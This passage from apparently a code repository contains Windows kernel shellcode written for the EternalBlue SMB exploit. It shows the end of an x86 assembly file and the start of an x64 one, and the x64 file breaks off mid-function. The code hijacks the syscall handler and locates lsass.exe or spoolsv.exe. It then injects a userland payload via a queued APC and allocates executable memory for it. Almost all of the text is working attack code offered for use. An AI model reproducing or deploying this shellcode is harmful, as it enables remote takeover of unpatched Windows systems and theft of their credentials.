 15 | ;     This helps running exploit against same target repeatly more reliable.
 16 | ; - The userland payload MUST be appened to this shellcode.
 17 | ;
 18 | ; Reference:
 19 | ; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
 20 | ; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
 21 | 
 22 | BITS 32
 23 | ORG 0
 24 | 
 25 | 
 26 | PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
 27 | PSGETPROCESSID_HASH    EQU    0x170114e1
 28 | PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
 29 | LSASS_EXE_HASH    EQU    0xc1fa6a5a
 30 | SPOOLSV_EXE_HASH    EQU    0x3ee083d8
 31 | ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
 32 | PSGETTHREADTEB_HASH    EQU    0xcef84c3e
 33 | KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
 34 | KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
 35 | PSGETPROCESSPEB_HASH    EQU    0xb818b848
 36 | CREATETHREAD_HASH    EQU    0x835e515e
 37 | 
 38 | 
 39 | 
 40 | DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
 41 | DATA_MODULE_ADDR_OFFSET     EQU 0x4
 42 | DATA_QUEUEING_KAPC_OFFSET   EQU 0x8
 43 | DATA_EPROCESS_OFFSET        EQU 0xc
 44 | DATA_KAPC_OFFSET            EQU 0x10
 45 | 
 46 | section .text
 47 | global shellcode_start
 48 | 
 49 | shellcode_start:
 50 | 
 51 | setup_syscall_hook:
 52 |     ; IRQL is DISPATCH_LEVEL when got code execution
 53 | %ifdef WIN7
 54 |     mov eax, [esp+0x20]     ; fetch SRVNET_BUFFER address from function argument
 55 |     ; set nByteProcessed to free corrupted buffer after return
 56 |     mov ecx, [eax+0x14]
 57 |     mov [eax+0x1c], ecx
 58 | %elifdef WIN8
 59 | %endif
 60 |     
 61 |     pushad
 62 | 
 63 |     call _setup_syscall_hook_find_eip
 64 | _setup_syscall_hook_find_eip:
 65 |     pop ebx
 66 | 
 67 |     call set_ebp_data_address_fn
 68 |     
 69 |     ; read current syscall
 70 |     mov ecx, 0x176
 71 |     rdmsr
 72 |     ; do NOT replace saved original syscall address with hook syscall
 73 |     lea edi, [ebx+syscall_hook-_setup_syscall_hook_find_eip]
 74 |     cmp eax, edi
 75 |     je _setup_syscall_hook_done
 76 |     
 77 |     ; if (saved_original_syscall != &KiFastCallEntry) do_first_time_initialize
 78 |     cmp dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
 79 |     je _hook_syscall
 80 |     
 81 |     ; save original syscall
 82 |     mov dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
 83 |     
 84 |     ; first time on the target, clear the data area
 85 |     ; edx should be zero from rdmsr
 86 |     mov dword [ebp+DATA_QUEUEING_KAPC_OFFSET], edx
 87 | 
 88 | _hook_syscall:
 89 |     ; set a new syscall on running processor
 90 |     ; setting MSR 0x176 affects only running processor
 91 |     mov eax, edi
 92 |     xor edx, edx
 93 |     wrmsr
 94 |     
 95 | _setup_syscall_hook_done:
 96 |     popad
 97 | %ifdef WIN7
 98 |     xor eax, eax
 99 | %elifdef WIN8
100 |     xor eax, eax
101 | %endif
102 |     ret 0x24
103 | 
104 | ;========================================================================
105 | ; Find memory address in HAL heap for using as data area
106 | ; Arguments: ebx = any address in this shellcode
107 | ; Return: ebp = data address
108 | ;========================================================================
109 | set_ebp_data_address_fn:
110 |     ; On idle target without user application, syscall on hijacked processor might not be called immediately.
111 |     ; Find some address to store the data, the data in this address MUST not be modified
112 |     ;   when exploit is rerun before syscall is called
113 |     lea ebp, [ebx + 0x1000]
114 |     shr ebp, 12
115 |     shl ebp, 12
116 |     sub ebp, 0x50   ; for KAPC struct too
117 |     ret
118 | 
119 | 
120 | syscall_hook:
121 |     mov ecx, 0x23
122 |     push 0x30
123 |     pop fs
124 |     mov ds,cx
125 |     mov es,cx
126 |     mov ecx, dword [fs:0x40]
127 |     mov esp, dword [ecx+4]
128 |     
129 |     push ecx    ; want this stack space to store original syscall addr
130 |     pushfd
131 |     pushad
132 |     
133 |     call _syscall_hook_find_eip
134 | _syscall_hook_find_eip:
135 |     pop ebx
136 |     
137 |     call set_ebp_data_address_fn
138 |     mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
139 |     
140 |     add eax, 0x17   ; adjust syscall entry, so we do not need to reverse start of syscall handler
141 |     mov [esp+0x24], eax ; 0x4 (pushfd) + 0x20 (pushad) = 0x24
142 |     
143 |     ; use lock cmpxchg for queueing APC only one at a time
144 |     xor eax, eax
145 |     cdq
146 |     inc edx
147 |     lock cmpxchg byte [ebp+DATA_QUEUEING_KAPC_OFFSET], dl
148 |     jnz _syscall_hook_done
149 | 
150 |     ;======================================
151 |     ; restore syscall
152 |     ;======================================
153 |     ; an error after restoring syscall should never occur
154 |     mov ecx, 0x176
155 |     cdq
156 |     mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
157 |     wrmsr
158 |     
159 |     ; allow interrupts while executing shellcode
160 |     sti
161 |     call r3_to_r0_start
162 |     cli
163 |     
164 | _syscall_hook_done:
165 |     popad
166 |     popfd
167 |     ret
168 | 
169 | r3_to_r0_start:    
170 |     ;======================================
171 |     ; find nt kernel address
172 |     ;======================================
173 |     mov eax, dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiFastCallEntry is an address in nt kernel
174 |     shr eax, 0xc                ; strip to page size
175 |     shl eax, 0xc
176 | 
177 | _find_nt_walk_page:
178 |     sub eax, 0x1000             ; walk along page size
179 |     cmp word [eax], 0x5a4d      ; 'MZ' header
180 |     jne _find_nt_walk_page
181 |     
182 |     ; save nt address
183 |     mov [ebp+DATA_MODULE_ADDR_OFFSET], eax
184 | 
185 |     ;======================================
186 |     ; get current EPROCESS and ETHREAD
187 |     ;======================================
188 |     mov eax, PSGETCURRENTPROCESS_HASH
189 |     call win_api_direct
190 |     xchg edi, eax       ; edi = EPROCESS
191 |     
192 |     ;======================================
193 |     ; find offset of EPROCESS.ImageFilename
194 |     ;======================================
195 |     mov eax, PSGETPROCESSIMAGEFILENAME_HASH
196 |     push edi
197 |     call win_api_direct
198 |     sub eax, edi
199 |     mov ecx, eax        ; ecx = offset of EPROCESS.ImageFilename
200 | 
201 |     ;======================================
202 |     ; find offset of EPROCESS.ThreadListHead
203 |     ;======================================
204 |     ; possible diff from ImageFilename offset is 0x1c and 0x24 (Win8+)
205 |     ; if offset of ImageFilename is 0x170, current is (Win8+)
206 | %ifdef WIN7
207 |     lea ebx, [eax+0x1c]
208 | %elifdef WIN8
209 |     lea ebx, [eax+0x24]
210 | %else
211 |     cmp eax, 0x170      ; eax is still an offset of EPROCESS.ImageFilename
212 |     jne _find_eprocess_threadlist_offset_win7
213 |     add eax, 0x8
214 | _find_eprocess_threadlist_offset_win7:
215 |     lea ebx, [eax+0x1c] ; ebx = offset of EPROCESS.ThreadListHead
216 | %endif
217 | 
218 |     
219 |     ;======================================
220 |     ; find offset of ETHREAD.ThreadListEntry
221 |     ;======================================
222 |     ; edi = EPROCESS
223 |     ; ebx = offset of EPROCESS.ThreadListHead
224 |     lea esi, [edi+ebx]   ; esi = address of EPROCESS.ThreadListHead
225 |     mov eax, dword [fs:0x124]    ; get _ETHREAD pointer from KPCR
226 |     ; ETHREAD.ThreadListEntry must be between ETHREAD (eax) and ETHREAD+0x400
227 | _find_ethread_threadlist_offset_loop:
228 |     mov esi, dword [esi]
229 |     ; if (esi - edi < 0x400) found
230 |     mov edx, esi
231 |     sub edx, eax
232 |     cmp edx, 0x400
233 |     ja _find_ethread_threadlist_offset_loop ; need unsigned comparison
234 |     push edx        ; save offset of ETHREAD.ThreadListEntry to stack
235 | 
236 | 
237 |     ;======================================
238 |     ; find offset of EPROCESS.ActiveProcessLinks
239 |     ;======================================
240 |     mov eax, PSGETPROCESSID_HASH
241 |     call get_proc_addr
242 |     mov eax, dword [eax+0xa]   ; get offset from code (offset of UniqueProcessId is always > 0x7f)
243 |     lea edx, [eax+4]    ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
244 |     
245 |     ;======================================
246 |     ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
247 |     ;======================================
248 |     ; edi = EPROCESS
249 |     ; ecx = offset of EPROCESS.ImageFilename
250 |     ; edx = offset of EPROCESS.ActiveProcessLinks
251 | _find_target_process_loop:
252 |     lea esi, [edi+ecx]
253 |     call calc_hash
254 |     cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
255 |     jz found_target_process
256 | %ifndef COMPACT
257 |     cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
258 |     jz found_target_process
259 | %endif
260 |     ; next process
261 |     mov edi, [edi+edx]
262 |     sub edi, edx
263 |     jmp _find_target_process_loop
264 | 
265 | 
266 | found_target_process:
267 |     ; The allocation for userland payload will be in KernelApcRoutine.
268 |     ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
269 | 
270 |     ;======================================
271 |     ; save EPROCESS for finding CreateThread address in kernel KAPC routine
272 |     ;======================================
273 |     mov [ebp+DATA_EPROCESS_OFFSET], edi
274 |     
275 |     
276 |     ;======================================
277 |     ; iterate ThreadList until KeInsertQueueApc() success
278 |     ;======================================
279 |     ; edi = EPROCESS
280 |     ; ebx = offset of EPROCESS.ThreadListHead
281 |     
282 |     lea ebx, [edi+ebx]  ; use ebx for iterating thread
283 |     lea esi, [ebp+DATA_KAPC_OFFSET] ; esi = KAPC address
284 |     pop edi ; edi = offset of ETHREAD.ThreadListEntry
285 | 
286 | 
287 |     ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
288 |     ; Moreover, alertable thread need to be waiting state which is more difficult to check.
289 |     ; try queueing APC then check KAPC member is more reliable.
290 | 
291 | _insert_queue_apc_loop:
292 |     ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
293 |     mov ebx, [ebx+4]
294 |     ; no check list head
295 |     
296 |     ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
297 |     ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
298 |     ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
299 |     ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
300 |     ; Teb member is next to Queue member.
301 |     mov eax, PSGETTHREADTEB_HASH
302 |     call get_proc_addr
303 |     mov eax, dword [eax+0xa]    ; get offset from code (offset of Teb is always > 0x7f)
304 | %ifdef WIN7
305 |     sub eax, edi
306 |     cmp dword [ebx+eax-12], 0   ; KTHREAD.Queue MUST not be NULL
307 | %elifdef WIN8
308 |     sub eax, edi
309 |     cmp dword [ebx+eax-4], 0    ; KTHREAD.Queue MUST not be NULL
310 | %else
311 |     cmp al, 0xa0                ; win8+ offset is 0xa8
312 |     ja _kthread_queue_check
313 |     sub al, 8                   ; late 5.2 to 6.1, displacement is 0xc
314 | _kthread_queue_check:
315 |     sub eax, edi
316 |     cmp dword [ebx+eax-4], 0    ; KTHREAD.Queue MUST not be NULL
317 | %endif
318 |     je _insert_queue_apc_loop
319 |     
320 |     ; KeInitializeApc(PKAPC,
321 |     ;                 PKTHREAD,
322 |     ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
323 |     ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
324 |     ;                 PKRUNDOWN_ROUTINE = NULL,
325 |     ;                 PKNORMAL_ROUTINE = userland_shellcode,
326 |     ;                 KPROCESSOR_MODE = UserMode (1),
327 |     ;                 PVOID Context);
328 |     xor eax, eax
329 |     push ebp    ; context
330 |     push 1      ; UserMode
331 |     push ebp    ; userland shellcode (MUST NOT be NULL)
332 |     push eax    ; NULL
333 |     call _init_kapc_find_kroutine
334 | _init_kapc_find_kroutine:
335 |     add dword [esp], kernel_kapc_routine-_init_kapc_find_kroutine  ; KernelApcRoutine
336 |     push eax    ; OriginalApcEnvironment
337 |     push ebx
338 |     sub [esp], edi  ; ETHREAD
339 |     push esi    ; KAPC
340 |     mov eax, KEINITIALIZEAPC_HASH
341 |     call win_api_direct
342 | 
343 | 
344 |     ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
345 |     ;   SystemArgument1 is second argument in usermode code
346 |     ;   SystemArgument2 is third argument in usermode code
347 |     xor eax, eax
348 |     push eax
349 |     push eax    ; SystemArgument2
350 |     push eax    ; SystemArgument1
351 |     push esi    ; PKAPC
352 |     mov eax, KEINSERTQUEUEAPC_HASH
353 |     call win_api_direct
354 |     ; if insertion failed, try next thread
355 |     test eax, eax
356 |     jz _insert_queue_apc_loop
357 |     
358 |     mov eax, [ebp+DATA_KAPC_OFFSET+0xc]      ; get KAPC.ApcListEntry
359 |     ; EPROCESS pointer 4 bytes
360 |     ; InProgressFlags 1 byte
361 |     ; KernelApcPending 1 byte
362 |     ; if success, UserApcPending MUST be 1
363 |     cmp byte [eax+0xe], 1
364 |     je _insert_queue_apc_done
365 |     
366 |     ; manual remove list without lock
367 |     mov [eax], eax
368 |     mov [eax+4], eax
369 |     jmp _insert_queue_apc_loop
370 | 
371 | _insert_queue_apc_done:
372 |     ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
373 | 
374 | _r3_to_r0_done:
375 |     ret
376 | 
377 | ;========================================================================
378 | ; Call function in specific module
379 | ; 
380 | ; All function arguments are passed as calling normal function with extra register arguments
381 | ; Extra Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
382 | ;                  eax = hash of target function name
383 | ;========================================================================
384 | win_api_direct:
385 |     call get_proc_addr
386 |     jmp eax
387 | 
388 | 
389 | ;========================================================================
390 | ; Get function address in specific module
391 | ; 
392 | ; Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
393 | ;            eax = hash of target function name
394 | ; Return: eax = offset
395 | ;========================================================================
396 | get_proc_addr:
397 |     pushad
398 | 
399 |     mov ebp, [ebp+DATA_MODULE_ADDR_OFFSET]   ; ebp = module address
400 |     xchg edi, eax   ; edi = hash
401 |     
402 |     mov eax, dword [ebp+0x3c]  ; Get PE header e_lfanew
403 |     mov edx, dword [ebp+eax+0x78] ; Get export tables RVA
404 | 
405 |     add edx, ebp    ; edx = EAT
406 | 
407 |     mov ecx, dword [edx+0x18]  ; NumberOfFunctions
408 |     mov ebx, dword [edx+0x20]  ; FunctionNames
409 |     add ebx, ebp
410 | 
411 | _get_proc_addr_get_next_func:
412 |     ; When we reach the start of the EAT (we search backwards), we hang or crash
413 |     dec ecx                     ; decrement NumberOfFunctions
414 |     mov esi, dword [ebx+ecx*4]  ; Get rva of next module name
415 |     add esi, ebp                ; Add the modules base address
416 | 
417 |     call calc_hash
418 | 
419 |     cmp eax, edi                        ; Compare the hashes
420 |     jnz _get_proc_addr_get_next_func    ; try the next function
421 | 
422 | _get_proc_addr_finish:
423 |     mov ebx, dword [edx+0x24]
424 |     add ebx, ebp                ; ordinate table virtual address
425 |     mov cx, word [ebx+ecx*2]    ; desired functions ordinal
426 |     mov ebx, dword [edx+0x1c]   ; Get the function addresses table rva
427 |     add ebx, ebp                ; Add the modules base address
428 |     mov eax, dword [ebx+ecx*4]  ; Get the desired functions RVA
429 |     add eax, ebp                ; Add the modules base address to get the functions actual VA
430 | 
431 |     mov [esp+0x1c], eax
432 |     popad
433 |     ret
434 | 
435 | ;========================================================================
436 | ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
437 | ; 
438 | ; Argument: esi = string to hash
439 | ; Clobber: esi
440 | ; Return: eax = hash
441 | ;========================================================================
442 | calc_hash:
443 |     push edx
444 |     xor eax, eax
445 |     cdq
446 | _calc_hash_loop:
447 |     lodsb                   ; Read in the next byte of the ASCII string
448 |     ror edx, 13             ; Rotate right our hash value
449 |     add edx, eax            ; Add the next byte of the string
450 |     test eax, eax           ; Stop when found NULL
451 |     jne _calc_hash_loop
452 |     xchg edx, eax
453 |     pop edx
454 |     ret
455 | 
456 | 
457 | 
458 | ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
459 | ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
460 | ; Moreover, there is no lock when calling KernelApcRoutine.
461 | ;
462 | ; VOID KernelApcRoutine(
463 | ;           IN PKAPC Apc,
464 | ;           IN PKNORMAL_ROUTINE *NormalRoutine,
465 | ;           IN PVOID *NormalContext,
466 | ;           IN PVOID *SystemArgument1,
467 | ;           IN PVOID *SystemArgument2)
468 | kernel_kapc_routine:
469 |     ; reorder stack to make everything easier
470 |     pop eax
471 |     mov [esp+0x10], eax    ; move saved eip to &SystemArgument2
472 |     pop eax     ; PKAPC (unused)
473 |     pop ecx     ; &NormalRoutine
474 |     pop eax     ; &NormalContext
475 |     pop edx     ; &SystemArgument1
476 |     
477 |     pushad
478 |     push edx    ; &SystemArgument1 (use for set CreateThread address)
479 |     push ecx    ; &NormalRoutine
480 |     
481 |     mov ebp, [eax]      ; *NormalContext is our data area pointer
482 | 
483 |     ;======================================
484 |     ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
485 |     ;======================================
486 |     xor eax, eax
487 |     mov byte [fs:0x24], al	; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
488 |     cdq
489 |     
490 |     mov al, 0x40    ; eax = 0x40
491 |     push eax            ; PAGE_EXECUTE_READWRITE = 0x40
492 |     shl eax, 6      ; eax = 0x40 << 6 = 0x1000
493 |     push eax            ; MEM_COMMIT = 0x1000
494 |     push esp            ; &RegionSize = 0x1000 (reuse MEM_COMMIT argument in stack)
495 |     push edx            ; ZeroBits
496 |     mov [ecx], edx
497 |     push ecx            ; baseAddr = 0
498 |     dec edx
499 |     push edx            ; ProcessHandle = -1
500 |     mov eax, ZWALLOCATEVIRTUALMEMORY_HASH
501 |     call win_api_direct
502 | %ifndef COMPACT
503 |     test eax, eax
504 |     jnz _kernel_kapc_routine_exit
505 | %endif
506 |     
507 |     ;======================================
508 |     ; copy userland payload
509 |     ;======================================
510 |     pop eax
511 |     mov edi, [eax]
512 |     call _kernel_kapc_routine_find_userland
513 | _kernel_kapc_routine_find_userland:
514 |     pop esi
515 |     add esi, userland_start-_kernel_kapc_routine_find_userland
516 |     mov ecx, 0x400  ; fix payload size to 1024 bytes
517 |     rep movsb
518 |     
519 |     ;======================================
520 |     ; find current PEB
521 |     ;======================================
522 |     mov eax, [ebp+DATA_EPROCESS_OFFSET]
523 |     push eax
524 |     mov eax, PSGETPROCESSPEB_HASH
525 |     call win_api_direct
526 |     
527 |     ;======================================
528 |     ; find CreateThread address (in kernel32.dll)
529 |     ;======================================
530 |     mov eax, [eax + 0xc]        ; PEB->Ldr
531 |     mov eax, [eax + 0x14]       ; InMemoryOrderModuleList
532 | 
533 | %ifdef COMPACT
534 |     mov esi, [eax]      ; first one always be executable, skip it
535 |     lodsd               ; skip ntdll.dll
536 | %else
537 | _find_kernel32_dll_loop:
538 |     mov eax, [eax]       ; first one always be executable
539 |     ; offset 0x1c (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
540 |     ; offset 0x24 (WORD)  => must be 0x18 (name len kernel32.dll)
541 |     ; offset 0x28  => is name
542 |     ; offset 0x10  => is dllbase
543 |     ;cmp word [eax+0x1c], 0x40
544 |     ;jne _find_kernel32_dll_loop
545 |     cmp word [eax+0x24], 0x18
546 |     jne _find_kernel32_dll_loop
547 |     
548 |     mov edx, [eax+0x28]
549 |     ; check only "32" because name might be lowercase or uppercase
550 |     cmp dword [edx+0xc], 0x00320033   ; 3\x002\x00
551 |     jnz _find_kernel32_dll_loop
552 | %endif
553 |     
554 |     mov ebx, [eax+0x10]
555 |     mov [ebp+DATA_MODULE_ADDR_OFFSET], ebx
556 |     mov eax, CREATETHREAD_HASH
557 |     call get_proc_addr
558 | 
559 |     ; save CreateThread address to SystemArgument1
560 |     pop ecx
561 |     mov [ecx], eax
562 |     
563 | _kernel_kapc_routine_exit:
564 |     xor eax, eax
565 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
566 |     mov byte [ebp+DATA_QUEUEING_KAPC_OFFSET], al
567 |     ; restore IRQL to APC_LEVEL
568 |     inc eax
569 |     mov byte [fs:0x24], al
570 |     
571 |     popad
572 |     ret
573 | 
574 |   
575 | userland_start:
576 | userland_start_thread:
577 |     ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
578 |     pop edx     ; saved eip
579 |     pop eax     ; first argument (NormalContext)
580 |     pop eax     ; CreateThread address passed from kernel
581 |     pop ecx     ; another argument (NULL) passed from kernel
582 |     push ecx        ; lpThreadId = NULL
583 |     push ecx        ; dwCreationFlags = 0
584 |     push ecx        ; lpParameter = NULL
585 |     call _userland_start_thread_find_payload
586 | _userland_start_thread_find_payload:
587 |     add dword [esp], userland_payload-_userland_start_thread_find_payload    ; lpStartAddr
588 |     push ecx        ; dwStackSize = 0
589 |     push ecx        ; lpThreadAttributes = NULL
590 |     push edx    ; restore saved eip
591 |     jmp eax
592 |     
593 | userland_payload:


--------------------------------------------------------------------------------
/shellcode/eternalblue_kshellcode_x64.asm:
--------------------------------------------------------------------------------
  1 | ;
  2 | ; Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
  3 | ; The shellcode is written for eternalblue exploit: eternalblue_exploit7.py and eternalblue_exploit8.py
  4 | ;
  5 | ;
  6 | ; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
  7 | ;
  8 | ;
  9 | ; Note:
 10 | ; - The userland shellcode is run in a new thread of system process.
 11 | ;     If userland shellcode causes any exception, the system process get killed.
 12 | ; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
 13 | ;     get call because system call is called on other processors.
 14 | ; - The shellcode do not allocate shadow stack if possible for minimal shellcode size.
 15 | ;     It is ok because some Windows function does not require shadow stack.
 16 | ; - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
 17 | ; - The userland payload MUST be appened to this shellcode.
 18 | ;
 19 | ; Reference:
 20 | ; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
 21 | ; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
 22 | 
 23 | BITS 64
 24 | ORG 0
 25 | 
 26 | 
 27 | PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
 28 | PSGETPROCESSID_HASH    EQU    0x170114e1
 29 | PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
 30 | LSASS_EXE_HASH    EQU    0xc1fa6a5a
 31 | SPOOLSV_EXE_HASH    EQU    0x3ee083d8
 32 | ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
 33 | PSGETTHREADTEB_HASH    EQU    0xcef84c3e
 34 | KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
 35 | KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
 36 | PSGETPROCESSPEB_HASH    EQU    0xb818b848
 37 | CREATETHREAD_HASH    EQU    0x835e515e
 38 | 
 39 | 
 40 | 
 41 | DATA_PEB_ADDR_OFFSET        EQU -0x10
 42 | DATA_QUEUEING_KAPC_OFFSET   EQU -0x8
 43 | DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
 44 | DATA_NT_KERNEL_ADDR_OFFSET  EQU 0x8
 45 | DATA_KAPC_OFFSET            EQU 0x10
 46 | 
 47 | section .text
 48 | global shellcode_start
 49 | 
 50 | shellcode_start:
 51 | 
 52 | setup_syscall_hook:
 53 |     ; IRQL is DISPATCH_LEVEL when got code execution
 54 | 
 55 | %ifdef WIN7
 56 |     mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
 57 |     ; set nByteProcessed to free corrupted buffer after return
 58 |     mov ecx, [rdx+0x2c]
 59 |     mov [rdx+0x38], ecx
 60 | %elifdef WIN8
 61 |     mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
 62 |     ; fix pool pointer (rcx is -0x8150 from controlled argument value)
 63 |     add rcx, rdx
 64 |     mov [rdx+0x30], rcx
 65 |     ; set nByteProcessed to free corrupted buffer after return
 66 |     mov ecx, [rdx+0x48]
 67 |     mov [rdx+0x40], ecx
 68 | %endif
 69 |     
 70 |     push rbp
 71 |     
 72 |     call set_rbp_data_address_fn
 73 |     
 74 |     ; read current syscall
 75 |     mov ecx, 0xc0000082
 76 |     rdmsr
 77 |     ; do NOT replace saved original syscall address with hook syscall
 78 |     lea r9, [rel syscall_hook]
 79 |     cmp eax, r9d
 80 |     je _setup_syscall_hook_done
 81 |     
 82 |     ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
 83 |     cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
 84 |     je _hook_syscall
 85 |     
 86 |     ; save original syscall
 87 |     mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
 88 |     mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
 89 |     
 90 |     ; first time on the target
 91 |     mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0
 92 | 
 93 | _hook_syscall:
 94 |     ; set a new syscall on running processor
 95 |     ; setting MSR 0xc0000082 affects only running processor
 96 |     xchg r9, rax
 97 |     push rax
 98 |     pop rdx     ; mov rdx, rax
 99 |     shr rdx, 32
100 |     wrmsr
101 |     
102 | _setup_syscall_hook_done:
103 |     pop rbp
104 |     
105 | %ifdef WIN7
106 |     xor eax, eax
107 | %elifdef WIN8
108 |     xor eax, eax
109 | %endif
110 |     ret
111 | 
112 | ;========================================================================
113 | ; Find memory address in HAL heap for using as data area
114 | ; Return: rbp = data address
115 | ;========================================================================
116 | set_rbp_data_address_fn:
117 |     ; On idle target without user application, syscall on hijacked processor might not be called immediately.
118 |     ; Find some address to store the data, the data in this address MUST not be modified
119 |     ;   when exploit is rerun before syscall is called
120 |     lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
121 | _set_rbp_data_address_fn_next:
122 |     shr rbp, 12
123 |     shl rbp, 12
124 |     sub rbp, 0x70   ; for KAPC struct too
125 |     ret
126 | 
127 | 
128 | syscall_hook:
129 |     swapgs
130 |     mov qword [gs:0x10], rsp
131 |     mov rsp, qword [gs:0x1a8]
132 |     push 0x2b
133 |     push qword [gs:0x10]
134 |     
135 |     push rax    ; want this stack space to store original syscall addr
136 |     ; save rax first to make this function continue to real syscall
137 |     push rax
138 |     push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
139 |     call set_rbp_data_address_fn
140 |     mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
141 |     add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
142 |     mov [rsp+0x10], rax
143 | 
144 |     ; save all volatile registers
145 |     push rcx
146 |     push rdx
147 |     push r8
148 |     push r9
149 |     push r10
150 |     push r11
151 |     
152 |     ; use lock cmpxchg for queueing APC only one at a time
153 |     xor eax, eax
154 |     mov dl, 1
155 |     lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
156 |     jnz _syscall_hook_done
157 | 
158 |     ;======================================
159 |     ; restore syscall
160 |     ;======================================
161 |     ; an error after restoring syscall should never occur
162 |     mov ecx, 0xc0000082
163 |     mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
164 |     mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
165 |     wrmsr
166 |     
167 |     ; allow interrupts while executing shellcode
168 |     sti
169 |     call r3_to_r0_start
170 |     cli
171 |     
172 | _syscall_hook_done:
173 |     pop r11
174 |     pop r10
175 |     pop r9
176 |     pop r8
177 |     pop rdx
178 |     pop rcx
179 |     pop rbp
180 |     pop rax
181 |     ret
182 | 
183 | r3_to_r0_start:
184 |     ; save used non-volatile registers
185 |     push r15
186 |     push r14
187 |     push rdi
188 |     push rsi
189 |     push rbx
190 |     push rax    ; align stack by 0x10
191 | 
192 |     ;======================================
193 |     ; find nt kernel address
194 |     ;======================================
195 |     mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
196 |     shr r15, 0xc                ; strip to page size
197 |     shl r15, 0xc
198 | 
199 | _x64_find_nt_walk_page:
200 |     sub r15, 0x1000             ; walk along page size
201 |     cmp word [r15], 0x5a4d      ; 'MZ' header
202 |     jne _x64_find_nt_walk_page
203 |     
204 |     ; save nt address for using in KernelApcRoutine
205 |     mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15
206 | 
207 |     ;======================================
208 |     ; get current EPROCESS and ETHREAD
209 |     ;======================================
210 |     mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
211 |     mov edi, PSGETCURRENTPROCESS_HASH
212 |     call win_api_direct
213 |     xchg rcx, rax       ; rcx = EPROCESS
214 |     
215 |     ; r15 : nt kernel address
216 |     ; r14 : ETHREAD
217 |     ; rcx : EPROCESS    
218 |     
219 |     ;======================================
220 |     ; find offset of EPROCESS.ImageFilename
221 |     ;======================================
222 |     mov edi, PSGETPROCESSIMAGEFILENAME_HASH
223 |     call get_proc_addr
224 |     mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
225 |     mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename
226 | 
227 | 
228 |     ;======================================
229 |     ; find offset of EPROCESS.ThreadListHead
230 |     ;======================================
231 |     ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
